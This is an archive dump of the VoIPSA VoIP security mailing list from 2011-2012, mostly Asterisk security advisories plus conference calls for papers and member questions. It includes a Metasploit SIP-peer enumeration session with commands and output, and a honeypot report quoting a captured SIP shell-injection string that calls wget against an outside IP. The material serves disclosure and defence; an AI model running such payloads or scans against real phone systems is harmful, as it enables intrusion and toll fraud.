http://blog.gmane.org/gmane.comp.voip.security.voipsa hourly 1 1901-01-01T00:00+00:00 http://gmane.org/img/gmane-25t.png http://gmane.org http://comments.gmane.org/gmane.comp.voip.security.voipsa/3153 <pre>To whom it may concern: I'm in need of a job, can anyone help me find employment in Illinois? </pre> LaFron Aldridge 2012-05-03T16:58:54 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3141 <pre>Hi all, for anyone interested in future voip security related stuff, i would suggest to join the IETF Rtcweb mailing lists, as in recent months there are very challenging discussion on Security of WebRTC standard (Encrypted VoIP embedded in all future browsers). Subscription on https://www.ietf.org/mailman/listinfo/rtcweb -naif </pre> Fabio Pietrosanti (naif 2012-05-02T20:47:38 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3123 <pre>VOIPSEC readers, Just testing the list as the archives do not appear to be working for the list. (And hey, giving you all a reminder that you are still on this list! :-) Regards, Dan </pre> Dan York 2012-05-02T15:37:44 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3122 <pre> Asterisk Project Security Advisory - AST-2012-005 Product Asterisk Summary Heap Buffer Overflow in Skinny Channel Driver Nature of Advisory Exploitable Heap Buffer Overflow Susceptibility Remote Authenticated Sessions Severity Minor Exploits Known No Reported On March 26, 2012 Reported By Russell Bryant Posted On April 23, 2012 Last Updated On April 23, 2012 Advisory Contact Matt Jordan &lt; mjordan AT digium DOT com &gt; CVE Name Description In the Skinny channel driver, KEYPAD_BUTTON_MESSAGE events are queued for processing in a buffer allocated on the heap, where each DTMF value that is received is placed on the end of the buffer. Since the length of the buffer is never checked, an attacker could send sufficient KEYPAD_BUTTON_MESSAGE events such that the buffer is overrun. Resolution The length of the buffer is now checked before appending a value to the end of the buffer. Affected Versions Product Release Series Asterisk Open Source 1.6.2.x All Versions Asterisk Open Source 1.8.x All Versions Asterisk Open Source 10.x All Versions Corrected In Product Release Asterisk Open Source 1.6.2.24, 1.8.11.1, 10.3.1 Patches SVN URL Revision http://downloads.asterisk.org/pub/security/AST-2012-005-1.6.2.diff v1.6.2 http://downloads.asterisk.org/pub/security/AST-2012-005-1.8.diff v1.8 http://downloads.asterisk.org/pub/security/AST-2012-005-10.diff v10 Links https://issues.asterisk.org/jira/browse/ASTERISK-19592 Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2012-005.pdf and http://downloads.digium.com/pub/security/AST-2012-005.html Revision History Date Editor Revisions Made 04/16/2012 Matt Jordan Initial Release Asterisk Project Security Advisory - AST-2012-005 Copyright (c) 2012 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. </pre> Asterisk Security Team 2012-04-23T18:25:30 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3121 <pre> Asterisk Project Security Advisory - AST-2012-006 Product Asterisk Summary Remote Crash Vulnerability in SIP Channel Driver Nature of Advisory Remote Crash Susceptibility Remote Authenticated Sessions Severity Moderate Exploits Known No Reported On April 16, 2012 Reported By Thomas Arimont Posted On April 23, 2012 Last Updated On April 23, 2012 Advisory Contact Matt Jordan &lt; mjordan AT digium DOT com &gt; CVE Name Description A remotely exploitable crash vulnerability exists in the SIP channel driver if a SIP UPDATE request is processed within a particular window of time. For this to occur, the following must take place: 1. The setting 'trustrpid' must be set to True 2. An UPDATE request must be received after a call has been terminated and the associated channel object has been destroyed, but before the SIP dialog associated with the call has been destroyed. Receiving the UPDATE request before the call is terminated or after the SIP dialog associated with the call will not cause the crash vulnerability described here. 3. The UPDATE request must be formatted with the appropriate headers to reflect an Asterisk connected line update. The information in the headers must reflect a different Caller ID then what was previously associated with the dialog. When these conditions are true, Asterisk will attempt to perform a connected line update with no associated channel, and will crash. Resolution Asterisk now ensures a channel exists before performing a connected line update, when that connected line update is initiated via a SIP UPDATE request. In Asterisk versions not containing the fix for this issue, setting the 'trustrpid' setting to False will prevent this crash from occurring (default is False) Affected Versions Product Release Series Asterisk Open Source 1.8.x All versions Asterisk Open Source 10.x All versions Asterisk Business Edition C.3.x All versions Corrected In Product Release Asterisk Open Source 1.8.11.1, 10.3.1 Asterisk Business Edition C.3.7.4 Patches SVN URL Revision http://downloads.asterisk.org/pub/security/AST-2012-006-1.8.diff v1.8 http://downloads.asterisk.org/pub/security/AST-2012-006-10.diff v.10 Links https://issues.asterisk.org/jira/browse/ASTERISK-19770 Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2012-006.pdf and http://downloads.digium.com/pub/security/AST-2012-006.html Revision History Date Editor Revisions Made 04/16/2012 Matt Jordan Initial release. Asterisk Project Security Advisory - AST-2012-006 Copyright (c) 2012 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. </pre> Asterisk Security Team 2012-04-23T18:25:34 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3120 <pre> Asterisk Project Security Advisory - AST-2012-004 Product Asterisk Summary Asterisk Manager User Unauthorized Shell Access Nature of Advisory Permission Escalation Susceptibility Remote Authenticated Sessions Severity Minor Exploits Known No Reported On February 23, 2011 Reported By David Woolley Posted On April 23, 2012 Last Updated On April 23, 2012 Advisory Contact Jonathan Rose &lt; jrose AT digium DOT com &gt; CVE Name Description A user of the Asterisk Manager Interface can bypass a security check and execute shell commands when they lack permission to do so. Under normal conditions, a user should only be able to run shell commands if that user has System class authorization. Users could bypass this restriction by using the MixMonitor application with the originate action or by using either the GetVar or Status manager actions in combination with the SHELL and EVAL functions. The patch adds checks in each affected action to verify if a user has System class authorization. If the user does not have those authorizations, Asterisk rejects the action if it detects the use of any functions or applications that run system commands. Resolution Asterisk now performs checks against manager commands that cause these behaviors for each of the affected actions. Affected Versions Product Release Series Asterisk Open Source 1.6.2.x All versions Asterisk Open Source 1.8.x All versions Asterisk Open Source 10.x All versions Asterisk Business Edition C.3.x All versions Corrected In Product Release Asterisk Open Source 1.6.2.24, 1.8.11.1, 10.3.1 Asterisk Business Edition C.3.7.4 Patches SVN URL Revision http://downloads.asterisk.org/pub/security/AST-2012-004-1.6.2.diff v1.6.2 http://downloads.asterisk.org/pub/security/AST-2012-004-1.8.diff v1.8 http://downloads.asterisk.org/pub/security/AST-2012-004-10.diff v10 Links https://issues.asterisk.org/jira/browse/ASTERISK-17465 Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2012-004.pdf and http://downloads.digium.com/pub/security/AST-2012-004.html Revision History Date Editor Revisions Made 04/23/2012 Jonathan Rose Initial Release Asterisk Project Security Advisory - AST-2012-004 Copyright (c) 2012 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. </pre> Asterisk Security Team 2012-04-23T18:25:22 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3119 <pre>How to Configure the New Call Blocking Asterisk Collector http://www.humbuglabs.org/blog/2012/03/20/how-to-configure-the-new-call-blocking-asterisk-collector/ Humbug Telecom Labs has released the Silver Hawk version of our collector for Asterisk based systems This new collector enables companies running Asterisk version 1.4 (or later) to benefit from Humbug’s fraud blocking service. The blocking is currently available for the following alerts: For Asterisk version 1.4 and up: - Business Hours - Time Range For Asterisk versions 1.6 and up: - Blacklist - Community Blacklist - Blacklist Country We will be expanding to cover all our alerts in the near future. For more details about the features in the latest release please see our blog about it &lt;http://www.humbuglabs.org/blog/2012/02/26/introducing-the-silver-hawk/&gt;. Essentially, when a call is made from the PBX, the humbug plug-in authenticates the call against the configured rules of these alerts, and if a deviation is found then it drops the call by sending a command to the Asterisk Manager Interface. In some cases the authentication is done locally (on the PBX) and in some cases it requires a HTTP connection to our server which is done in the background. For the blocking you work you will need to make sure you are running the latest version of the humbug collector (version 0.8.0.0) This is available for download from: http://secure.humbuglabs.org/downloads/humbug-collector-0.8.0-0.i386.rpm If you are upgrading from the old plugin to the new one, please add the following listed in your configuration file (/etc/humbug/humbug.conf): # Check community blacklist community_blacklist = no/yes # Do Hangup action_hangup = no/yes </pre> Eric Klein 2012-03-21T12:27:48 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3118 <pre> Asterisk Project Security Advisory - AST-2012-003 Product Asterisk Summary Stack Buffer Overflow in HTTP Manager Nature of Advisory Exploitable Stack Buffer Overflow Susceptibility Remote Unauthenticated Sessions Severity Critical Exploits Known No Reported On 03/15/2012 Reported By Russell Bryant Posted On 03/15/2012 Last Updated On March 15, 2012 Advisory Contact Matt Jordan &lt; mjordan AT digium DOT com &gt; CVE Name Description An attacker attempting to connect to an HTTP session of the Asterisk Manager Interface can send an arbitrarily long string value for HTTP Digest Authentication. This causes a stack buffer overflow, with the possibility of remote code injection. Resolution Upgrade to one of the versions of Asterisk listed in the "Corrected In" section, or apply a patch specified in the "Patches" section. Affected Versions Product Release Series Asterisk Open Source 1.8.x All versions Asterisk Open Source 10.x All versions Corrected In Product Release Asterisk Open Source 1.8.10.1 Asterisk Open Source 10.2.1 Patches SVN URL Revision http://downloads.asterisk.org/pub/security/AST-2012-003-1.8.diff v1.8 http://downloads.asterisk.org/pub/security/AST-2012-003-10.diff v10 Links https://issues.asterisk.org/jira/browse/ASTERISK-19542 Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/.pdf and http://downloads.digium.com/pub/security/.html Revision History Date Editor Revisions Made 03-15-2012 Matt Jordan Initial release Asterisk Project Security Advisory - AST-2012-003 Copyright (c) 2012 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. </pre> Asterisk Security Team 2012-03-15T22:05:33 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3117 <pre> Asterisk Project Security Advisory - AST-2012-002 Product Asterisk Summary Remote Crash Vulnerability in Milliwatt Application Nature of Advisory Exploitable Stack Buffer Overflow with locally defined data Susceptibility Remote Unauthenticated Sessions Severity Minor Exploits Known No Reported On 03/14/2012 Reported By Russell Bryant Posted On 03/15/2012 Last Updated On March 15, 2012 Advisory Contact Matt Jordan &lt;mjordan AT digium DOT com&gt; CVE Name Description An attacker can cause Asterisk to crash in one of two ways: 1. A dialplan uses the Milliwatt application with 'o' option 2. The internal_timing opion in asterisk.conf is off 3. The attacker sends a large audio packet. The number of samples in the audio packet determines the number of internal data samples that are copied into the buffer. This overruns the buffer, potentially causing a crash. OR 1. A diaplan uses the Milliwatt application with the 'o' option 2. The attacker negotiates a media format with a sampling rate greater than 32kHz. The application will attempt to generate an audio packet using the sample rate of the negotiated format, where the sample rate will require a number of data points greater then the size of the buffer. Again, the the application copies a number of internal data samples into the buffer that are greater then the size of the buffer, potentially causing a crash. Note that the latter attack vector is only possible in Asterisk 10, as it supports codecs with a sample rate greater then 32kHz. Resolution Upgrade to one of the versions of Asterisk listed in the "Corrected In" section, or apply a patch specified in the "Patches" section. Affected Versions Product Release Series Asterisk Open Source 1.4.x All Versions Asterisk Open Source 1.6.2.x All Versions Asterisk Open Source 1.8.x All Versions Asterisk Open Source 10.x All Versions Corrected In Product Release Asterisk Open Source 1.4.44 Asterisk Open Source 1.6.2.23 Asterisk Open Source 1.8.10.1 Asterisk Open Source 10.2.1 Patches SVN URL Revision http://downloads.asterisk.org/pub/security/AST-2012-002-1.4.diff v1.4 http://downloads.asterisk.org/pub/security/AST-2012-002-1.6.2.diff v1.6.2 http://downloads.asterisk.org/pub/security/AST-2012-002-1.8.diff v1.8 http://downloads.asterisk.org/pub/security/AST-2012-002-10.diff v10 Links https://issues.asterisk.org/jira/browse/ASTERISK-19541 Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/.pdf and http://downloads.digium.com/pub/security/.html Revision History Date Editor Revisions Made 03/15/2012 Matt Jordan Initial Release Asterisk Project Security Advisory - AST-2012-002 Copyright (c) 2012 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. </pre> Asterisk Security Team 2012-03-15T22:04:45 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3113 <pre>A Metasploit module is attached that demonstrates how to enumerate Asterisk sip peers that have a nat setting different to the global sip nat setting as described in Asterisk Security Advisory AST-2011-013. The example below finds all peers with nat=yes, but the metasploit module will also work when global nat=yes and peers have nat=no. Vulnerability discovered and exploit created by Ben Williams. References: http://downloads.asterisk.org/pub/security/AST-2011-013.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4597 Example sip.conf: [general] context=default alwaysauthreject = yes [1000] nat=yes type=peer secret=12345cdsf0sd9r2e9 callerid=John Doe &lt;1000&gt; host=dynamic context=trusted [1001] nat=yes secret=12345 type=peer host=dynamic [1002] secret=12345a type=peer host=dynamic # svn co https://www.metasploit.com/svn/framework3/trunk/ # cp enumerator_asterisk_nat_peers.rb trunk/modules/auxiliary/scanner/sip/ # cd trunk # msfconsole MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM# JMMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm `?MMM MMMM` dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM =[ metasploit v4.0.0-release [core:4.0 api:1.0] + -- --=[ 716 exploits - 362 auxiliary - 68 post + -- --=[ 226 payloads - 27 encoders - 8 nops =[ svn r13462 updated 143 days ago (2011.08.01) Warning: This copy of the Metasploit Framework was last updated 143 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: https://community.rapid7.com/docs/DOC-1306 msf &gt; use auxiliary/scanner/sip/enumerator_asterisk_nat_peers msf auxiliary(enumerator_asterisk_nat_peers) &gt; info Name: SIP Username Enumerator for Asterisk (UDP) Security Advisory AST-2011-013, CVE-2011-4597 Module: auxiliary/scanner/sip/enumerator_asterisk_nat_peers Version: 1 License: Metasploit Framework License (BSD) Rank: Normal Provided by: Ben Williams Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no The local client address CPORT 5070 no The local client port MAXEXT 9999 yes Ending extension MINEXT 0 yes Starting extension PADLEN 4 yes Cero padding maximum length RHOSTS yes The target address range or CIDR identifier RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads Description: REGISTER scan for numeric peer usernames having a nat setting different to global sip nat setting. Works even when alwaysauthreject=yes. For this exploit to work, the source port cannot be 5060. For more details see Asterisk Project Security Advisory - AST-2011-013 msf auxiliary(enumerator_asterisk_nat_peers) &gt; set RHOSTS 172.16.0.1 RHOSTS =&gt; 172.16.0.1 msf auxiliary(enumerator_asterisk_nat_peers) &gt; set MINEXT 1000 MINEXT =&gt; 1000 msf auxiliary(enumerator_asterisk_nat_peers) &gt; set MAXEXT 2000 MAXEXT =&gt; 2000 msf auxiliary(enumerator_asterisk_nat_peers) &gt; run [*] Found user: 1000 &lt;sip:1000&lt; at &gt;172.16.0.1&gt; [Auth] [*] Found user: 1001 &lt;sip:1001&lt; at &gt;172.16.0.1&gt; [Auth] [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(enumerator_asterisk_nat_peers) &gt; _______________________________________________ Voipsec mailing list Voipsec&lt; at &gt;voipsa.org http://voipsa.org/mailman/listinfo/voipsec_voipsa.org </pre> Ben Williams 2011-12-22T19:23:27 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3112 <pre>[CFP] FRHACK Africa 2012 Call For Papers ,. . :%%%. .%%%. __%%%(\ `%%%%% .%%%%% /a ^ '% %%%% %: ,% %%"` '__.. ,'% .-%: %-' % ~~""%:. ` % ' . `. %% % ` %% .%: . \. %%:. `-' ` .%% . %: :\ %(%,%..." `%, %%' %% ) ) %)%%)%%' )%%%.....- ' "/ ( %a:f%%\ % / \`% "%%% ` / \)) %(%' % /-. \ ' \ |-. '. `' |% `() \| `() || / () / () 0 | o \ /\ o / o ` /-| ,-/ ` ,-/ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + FRHACK Africa + Call For Papers + June 1-2, 2012, Casablanca, Morocco, Africa + http://www.frhack.org ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "None but ourselves can free our minds", Bob Marley [ - Introduction - ] FRHACK is an International IT Security Conference FRHACK is not commercial - but - highly technical. Target Audience: Security Officers, Security Professionals and Product Vendors, IT Decision Makers, Policy Makers, Security-, Network-, and Firewall Administrators, Teachers, Academic Researchers and Software Developers, hackers... The FRHACK Team (TFT) encourages speakers to present new and interesting projects for FRHACK and will give preferential treatment to submissions that have not been presented at other conferences. Further, TFT invites any individual who has not spoken at a conference before to submit a talk and attempt to make FRHACK their inaugural event! Papers should be submitted in English. The conference language is English. (Anyway, papers in Arabic or French are accepted for special post-event tracks.) Conference will be held in Casablanca, Morocco, North of Africa, and aims to get together industry, government, academia and underground hackers to share knowledge and leading-edge ideas about information security and everything related to it. FRHACK will feature national and international speakers and attendees with a wide range of skills. The atmosphere is favorable to present all facets of computer security subject and will be a great opportunity to network with like-minded people and enthusiasts. [ - The venue - ] Don't forget your Humphrey Bogart's style black hat while coming to Casablanca. Casablanca ('White House') is Morocco's largest city as well as its chief port. It is also the biggest city in the Maghreb. https://en.wikipedia.org/wiki/Casablanca Did you know that Arabic is the fastest growing language in the Web? http://wikileaks.org/spyfiles/files/0/71_201110-ISS-IAD-T5-SCAN_AND_TARGET.pdf More information soon available at http://www.frhack.org [ - Topics - ] TFT gives preference to lectures with practical demonstration. The conference staff will try to provide every equipment needed for the presentation in the case the author cannot provide them. The following topics include, but are not limited to: - Rootkits - Cryptography - Cloud security - Reverse engineering - Penetration testing - Web application security - Exploit development techniques - Internet, privacy and Big Brother - Telecom security and phone phreaking - Fuzzing and application security test - Security in Wi-Fi and VoIP environments - Information warfare and industrial espionage - Denial of service attacks and/or countermeasures - Analysis of virus, worms and all sorts of malwares - Technical approach to alternative operating systems - Techniques for development of secure software &amp; systems - Information about smartcard and RFID security and similars - Lockpicking, trashing, physical security and urban exploration - Hardware hacking, embedded systems and other electronic devices - Mobile devices exploitation, Android, iOS, 3/4G and other technologies - Security aspects in SCADA, industrial environments and "obscure" networks [ - Important dates - ] Conference and trainings 20120530-31: FRHACK trainings 20120601-02: FRHACK conferences Linkedin group: http://www.linkedin.com/groups?gid=1613377 Deadline and submissions - Deadline for proposal submissions: 20120331 - Deadline for slides submissions: 20120512 - Notification of acceptance or rejection: 20120430 * E-mail for proposal submissions: cfp&lt; at &gt;frhack.org * Make sure to provide along with your submission the following details: - Speaker name and/or nickname, address, e-mail, phone number and general contact information - A brief but informative description about your talk - Short biography of the presenter, including organization, company and affiliations - Estimated time-length of presentation and language - General topic of the speech (eg.: network security, secure programming, computer forensics, etc.) - Any other technical requirements for your lecture - Whether you need visa to enter Morocco or not Speakers will be allocated 50 minutes of presentation time, although, if needed, we can extend the presentation length if requested in advance. Preferrable file format for papers and slides are both PDF and also ODT/PPT for slides. Speakers are asked to hand in slides used in their lectures. PLEASE NOTE: Bear in mind no sales pitches will be allowed. If your presentation involves advertisement of products or services please do not submit. [ - Information for speakers - ] We are looking for sponsors to cover conference's expenses. Speakers' privileges are: - Accommodation for 3 nights - Help covering travel expenses - Free pass to the conference for you and a friend - Speaker activities during, before, and after the conference - Speaker After-Party ... [ - Information for instructors - ] - 50% of the net profit of the class - Accommodation during the trainings - Free pass to the conference - Speaker activities during, before, and after the conference - Speaker After-Party ... [ - Information for sponsors - ] - If you can provide or offer materials, devices, goodies and money, please contact us at: frhack-sponsor&lt; at &gt;frhack.org [ - Information for attendees - ] More information will be available soon on our website http://www.frhack.org or feel free to contact us at: frhack&lt; at &gt;frhack.org We will also celebrate our new Hacker Space and an Hacking challenge will be organized during the events. Thanks and see you soon for FHRACK. Happy Hacking! Jerome Athias, Founder, Chairman, Program Coordinator /JA </pre> Jerome Athias 2011-12-10T13:29:54 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3111 <pre> Asterisk Project Security Advisory - AST-2011-014 Product Asterisk Summary Remote crash possibility with SIP and the "automon" feature enabled Nature of Advisory Remote crash vulnerability in a feature that is disabled by default Susceptibility Remote unauthenticated sessions Severity Moderate Exploits Known Yes Reported On November 2, 2011 Reported By Kristijan Vrban Posted On 2011-11-03 Last Updated On December 7, 2011 Advisory Contact Terry Wilson &lt;twilson&lt; at &gt;digium.com&gt; CVE Name Description When the "automon" feature is enabled in features.conf, it is possible to send a sequence of SIP requests that cause Asterisk to dereference a NULL pointer and crash. Resolution Applying the referenced patches that check that the pointer is not NULL before accessing it will resolve the issue. The "automon" feature can be disabled in features.conf as a workaround. Affected Versions Product Release Series Asterisk Open Source 1.6.2.x All versions Asterisk Open Source 1.8.x All versions Corrected In Product Release Asterisk Open Source 1.6.2.21, 1.8.7.2 Patches Download URL Revision http://downloads.asterisk.org/pub/security/AST-2011-014-1.6.2.diff 1.6.2.20 http://downloads.asterisk.org/pub/security/AST-2011-014-1.8.diff 1.8.7.1 Links Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2011-014.pdf and http://downloads.digium.com/pub/security/AST-2011-014.html Revision History Date Editor Revisions Made Asterisk Project Security Advisory - AST-2011-014 Copyright (c) 2011 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. </pre> Asterisk Security Team 2011-12-08T22:48:55 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3110 <pre> Asterisk Project Security Advisory - AST-2011-013 Product Asterisk Summary Possible remote enumeration of SIP endpoints with differing NAT settings Nature of Advisory Unauthorized data disclosure Susceptibility Remote unauthenticated sessions Severity Minor Exploits Known Yes Reported On 2011-07-18 Reported By Ben Williams Posted On Last Updated On December 7, 2011 Advisory Contact Terry Wilson &lt;twilson&lt; at &gt;digium.com&gt; CVE Name Description It is possible to enumerate SIP usernames when the general and user/peer NAT settings differ in whether to respond to the port a request is sent from or the port listed for responses in the Via header. In 1.4 and 1.6.2, this would mean if one setting was nat=yes or nat=route and the other was either nat=no or nat=never. In 1.8 and 10, this would mean when one was nat=force_rport or nat=yes and the other was nat=no or nat=comedia. Resolution Handling NAT for SIP over UDP requires the differing behavior introduced by these options. To lessen the frequency of unintended username disclosure, the default NAT setting was changed to always respond to the port from which we received the request-the most commonly used option. Warnings were added on startup to inform administrators of the risks of having a SIP peer configured with a different setting than that of the general setting. The documentation now strongly suggests that peers are no longer configured for NAT individually, but through the global setting in the "general" context. Affected Versions Product Release Series Asterisk Open Source All All versions Corrected In As this is more of an issue with SIP over UDP in general, there is no fix supplied other than documentation on how to avoid the problem. The default NAT setting has been changed to what we believe the most commonly used setting for the respective version in Asterisk 1.4.43, 1.6.2.21, and 1.8.7.2. Links Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2011-013.pdf and http://downloads.digium.com/pub/security/AST-2011-013.html Revision History Date Editor Revisions Made Asterisk Project Security Advisory - AST-2011-013 Copyright (c) 2011 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. </pre> Asterisk Security Team 2011-12-08T22:47:42 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3109 <pre>So after a dozen years or so organizing conferences, you get the urge to pull levers and try experimenting with things. So this year I sent out the CanSecWest CFP only over Twitter, and G+ publicly. Just curious as to the adoption and information dispersion rate, and some estimate of the attention these newer channels are getting. So after this experiment I hear about people having submissions and missing  the CFP. So for my control set, here is the normal announce message to different e-mail lists. We'll do a Second CanSecWest CFP, but a brief one. Send us your proposal by the end of Monday next week, December 5, 2011. The questions and information needed is the same as usual (see website), also for my curiosity could you include: 12. Where did you hear about the CFP from? cheers, --dr </pre> Dragos Ruiu 2011-11-30T02:04:38 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3108 <pre> Asterisk Project Security Advisory - AST-2011-012 Product Asterisk Summary Remote crash vulnerability in SIP channel driver Nature of Advisory Remote crash Susceptibility Remote authenticated sessions Severity Critical Exploits Known No Reported On October 4, 2011 Reported By Ehsan Foroughi Posted On October 17, 2011 Last Updated On October 17, 2011 Advisory Contact Terry Wilson &lt;twilson&lt; at &gt;digium.com&gt; CVE Name CVE-2011-4063 Description A remote authenticated user can cause a crash with a malformed request due to an unitialized variable. Resolution Ensure variables are initialized in all cases when parsing the request. Affected Versions Product Release Series Asterisk Open Source 1.8.x All versions Asterisk Open Source 10.x All versions (currently in beta) Corrected In Product Release Asterisk Open Source 1.8.7.1, 10.0.0-rc1 Patches Download URL Revision http://downloads.asterisk.org/pub/security/AST-2011-012-1.8.diff 1.8 http://downloads.asterisk.org/pub/security/AST-2011-012-10.diff 10 Links Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2011-012.pdf and http://downloads.digium.com/pub/security/AST-2011-012.html Revision History Date Editor Revisions Made Asterisk Project Security Advisory - AST-2011-012 Copyright (c) 2011 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. </pre> Asterisk Security Team 2011-10-17T17:44:25 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3107 <pre>Hi Does anyone have any good resources for testing Mitel VOIP systems? I'm looking for anything from good practice installation guides through to tools to help attack phones or the call server. Anything anyone has got would be good. Robin </pre> Robin Wood 2011-10-08T18:35:45 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3105 <pre>Friends, The last weeks I've been trying to dive into the various SIP RFCs to get an overview of the TLS implementation and try to understand security aspects. It's really hard work, so I understand why so few implementors get there or when they do, do it right. SIPit is a bi-annual test event for SIP interoperability. The next event is in Monaco, Europe at the end of October this year. I will participate there and focus on VoIP security as well as IPv6. We have built some do-it-yourself testbeds and will continue with group tests in order to try to understand issues involved and where to go next. Customers need at least first hop TLS and SRTP to work as expected. They also need interoperability between devices. To get interoperability, everyone needs to work with it. It just doesn't happen by accident. SIPit has been organised twice a year for 15 years in order to get the amount of interoperability we have today in SIP. If you develop SIP software or devices - register for SIPit now. If you are a customer and have seen issues in this area, remind your vendors to participate. The more we are, the more time we can spend on VoIP protocol security. SIPit is at http://www.sipit.net where you also can find reports from previous SIPits. See you in Monaco! /O </pre> Olle E. Johansson 2011-09-30T09:00:36 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3104 <pre>Dear member of Voip SA, I need your help about test security on Ip-Telephony with Cisco Call Manager Rel 7, Ip-Phone 7940-7911, and Router Cisco 2800 series with 12.4 ios with 2 wic Bri Interface and 1wic xDSL interface. No firewall on the Fe0/1 and there are 2 Vlan: vlan Voice and Vlan Data. But despite this we have been a fraud from about 6000 euros. Could you help me about a tool test so I call the installer and I ask you to correct the problem? Thanks, reagards Paolo Digita il testo o l'indirizzo di un sito web oppure traduci un documento&lt;http://translate.google.it/?tr=f&amp;hl=it&gt; . Annulla &lt;http://translate.google.it/?tr=t&amp;hl=it&gt; Traduzione da italiano verso inglese </pre> Paolo Caramori 2011-09-18T10:42:03 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3096 <pre>Someone on the Asterisk mailing lists suggested I post this observation here. On my SIP honeypot, I saw a new (to my eyes) embedded shell injection scan as follows: INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`&lt; at &gt;x.x.x.x SIP/2.0. I suspect that the 91.223.89.94 is strictly a web server being used to collect logs of vulnerable hosts (vulnerable to the shell injection as it parses the received URI). Someone SIP/PBX framework is probably vulnerable to that sort of shell injection and this scan is the collection process to identify hosts available for further shell injection attacks. the V.php appears to be a NOOP for the time being, hence my suggestion that it is strictly to populate a web server log with vulnerable hosts. </pre> Tom Browning 2011-09-12T14:19:09 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3095 <pre>Apologies for cross posting but some of us aren't on the other list (vice/versa) and thought both groups would benefit. For those familiar with the VoIP Abuse Project, no need to explain the gist of this. I got tired of parsing through the alerts (lists) I receive via email daily. They're long and sometimes I don't have the time to post them all. So for now, posting VoIP Abuse addresses straight to Twitter. So, anyone trying to compromise a pbx, is now autoposted on an hourly basis to Twitter. Still working on pulling, have about 4 machines linked up now, will mop em up during the week. http://twitter.com/#!/voipabuse Now, you can concoct a quick script off of it, e.g.: links -dump "http://twitter.com/voipabuse"|awk '/attacker/{print "iptables -A INPUT -s "$2" -j DROP"| "sort -u"}' Will get a quickie soon from my Acme's, nCites, etc. when I have time. For those NOT familiar with it, please Google it as I don't feel like typing anymore ;) (sorry) </pre> J. Oquendo 2011-08-22T20:25:06 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3094 <pre>Hi, Is there tools to compare asterisk tls-srtp QoS compared to asterisk without it in large scale? maybe simulate lots of calls? Thank you, Arif </pre> arif setiawan 2011-08-11T04:14:41 